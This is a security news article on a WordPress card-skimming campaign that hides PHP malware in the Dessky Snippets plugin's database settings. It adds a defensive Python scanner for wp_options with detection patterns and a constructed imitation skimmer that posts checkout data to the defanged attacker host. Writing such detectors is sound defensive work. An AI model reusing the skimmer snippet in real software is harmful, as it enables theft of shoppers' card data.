WordPress Users Lose Money as Hackers Exploit Little-Known Plugins

According to a report from Sucuri, unknown attackers are abusing little-known WordPress plugins to inject malicious PHP code into websites and steal payment data. On May 11, Sucuri researchers identified a campaign in which the attackers abused the Dessky Snippets plugin, which has roughly 200 active installations and lets site owners add their own PHP code to a site.

In these attacks, the hackers first obtain administrator access, either by exploiting vulnerabilities in WordPress plugins or by guessing weak login credentials. They then install additional plugins to further their operations. The Dessky Snippets plugin is used to deploy server-side PHP malware that skims credit card details entered on the compromised site's checkout page and hands the financial data to the attackers.

The malicious code is stored in the dnsp_settings option of the wp_options table and alters the WooCommerce checkout process. It modifies the billing form by adding fields for payment card details: name, address, card number, expiration date, and CVV. The collected data is then sent to the URL hxxps://2of[.]cc/wp-content/.

Characteristics of the malicious campaign

The billing form injected by the campaign carries the autocomplete="off" attribute. This lowers the chance that the browser will warn the user about entering sensitive information, and the form fields stay blank until the user fills them in manually, which reduces suspicion.
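A site owner or responder who wants to check for this kind of injection does not need the plugin's UI: the code lives in the database, so the wp_options table can be queried and scanned for the behaviours described above (the exfiltration host, card-field names, autocomplete="off", an outbound request from PHP, a hook into the WooCommerce checkout). The script below is an added example and not code from the Sucuri report or from the plugin. It builds an in-memory SQLite stand-in for wp_options with constructed rows; the "skimmer" row imitates the described behaviour but is not the real payload, and the hook names, variable names and indicator labels are assumptions. Against a live site, point the same query at MySQL (for example via a mysql client or WP-CLI's `wp db query`) and unserialize the option value first if the plugin stores it PHP-serialized.

```python
"""Scan wp_options for card-skimmer PHP hidden in a snippet plugin's settings.

Example code, not part of the original report. Indicator labels, the sample
rows and the hook names in the fake snippet are constructed for illustration.
"""
import re
import sqlite3
from typing import Dict, List, Tuple

# Indicators drawn from the behaviour described in the report. The labels on
# the left are our own names, not anything from the report.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    # defanged or live form of the exfiltration host named in the report
    "exfil-host": re.compile(r"2of\[?\.\]?cc", re.I),
    # field names a fake payment form would use
    "card-fields": re.compile(r"card[_-]?(number|num)|cvv|cvc|expir", re.I),
    # the attribute the campaign sets on its billing form
    "autocomplete-off": re.compile(r"""autocomplete\s*=\s*["']?off["']?""", re.I),
    # ways PHP code posts data off-site
    "outbound-request": re.compile(
        r"\b(curl_init|curl_setopt|wp_remote_post|file_get_contents|fsockopen)\s*\("),
    # any hook into the WooCommerce checkout flow
    "checkout-hook": re.compile(r"woocommerce_[a-z_]*checkout[a-z_]*"),
    # common wrappers used to hide injected code
    "obfuscation": re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|eval)\s*\("),
}

# Options known to hold user-supplied PHP; dnsp_settings is the one the
# report names. A single indicator is enough to flag one of these rows.
SNIPPET_OPTIONS = ("dnsp_settings",)


def scan_option_value(value: str) -> List[str]:
    """Return the sorted indicator labels present in one option value."""
    return sorted(label for label, pat in INDICATORS.items() if pat.search(value))


def find_suspicious_options(conn: sqlite3.Connection) -> Dict[str, List[str]]:
    """Query wp_options and return {option_name: [indicators]} for rows that
    look like injected skimmer code. A known snippet option is reported on
    one hit; any other option needs two hits, or the exfil host on its own."""
    findings: Dict[str, List[str]] = {}
    rows = conn.execute("SELECT option_name, option_value FROM wp_options")
    for name, value in rows:
        hits = scan_option_value(value or "")
        threshold = 1 if name in SNIPPET_OPTIONS else 2
        if hits and ("exfil-host" in hits or len(hits) >= threshold):
            findings[name] = hits
    return findings


# Constructed imitation of an injected snippet (NOT the real malware): hooks
# the checkout, prints a blank card form with autocomplete="off" and posts
# the submitted values to the attacker host. Hook and function names are
# assumptions; the URL is defanged.
FAKE_SKIMMER = r"""
add_action('woocommerce_after_checkout_billing_form', 'dnsp_card_form');
function dnsp_card_form() {
    echo '<div class="billing"><form autocomplete="off">'
       . '<input name="billing_card_number" value="">'
       . '<input name="billing_expiry" value="">'
       . '<input name="billing_cvv" value="">'
       . '</form></div>';
}
add_action('woocommerce_checkout_process', 'dnsp_send');
function dnsp_send() {
    wp_remote_post('hxxps://2of[.]cc/wp-content/', array('body' => $_POST));
}
"""

# Constructed sample rows: two benign options and the injected one.
SAMPLE_ROWS: List[Tuple[str, str]] = [
    ("siteurl", "https://shop.example"),
    ("woocommerce_checkout_pay_endpoint", "order-pay"),
    ("dnsp_settings", FAKE_SKIMMER),
]


def build_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL wp_options table (same columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, "
        "option_name TEXT, option_value TEXT, autoload TEXT)")
    conn.executemany(
        "INSERT INTO wp_options (option_name, option_value, autoload) "
        "VALUES (?, ?, 'yes')", SAMPLE_ROWS)
    return conn


if __name__ == "__main__":
    for opt, hits in find_suspicious_options(build_sample_db()).items():
        print(f"{opt}: {', '.join(hits)}")
```

The two-hit threshold for ordinary options keeps a legitimate plugin setting that merely mentions "expiry" from being reported, while anything that references the exfiltration host is reported regardless. Treat a hit on dnsp_settings (or any snippet option you did not write yourself) as an incident, not a cleanup task: the attacker already had administrator access to put it there.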

Recommendations for WordPress site owners

WordPress site owners, especially those running e-commerce features, are advised to keep WordPress and all plugins up to date, use strong passwords so that administrator accounts cannot be guessed, and routinely check their sites for signs of malware or unauthorized changes, including unexpected administrator accounts, newly installed plugins, and code stored in plugin settings such as the wp_options table used by this campaign.

Earlier reports indicated that cybercriminals had begun exploiting a critical vulnerability in the WP Automatic plugin for WordPress that lets them create accounts with administrative privileges and plant backdoors for persistent access.
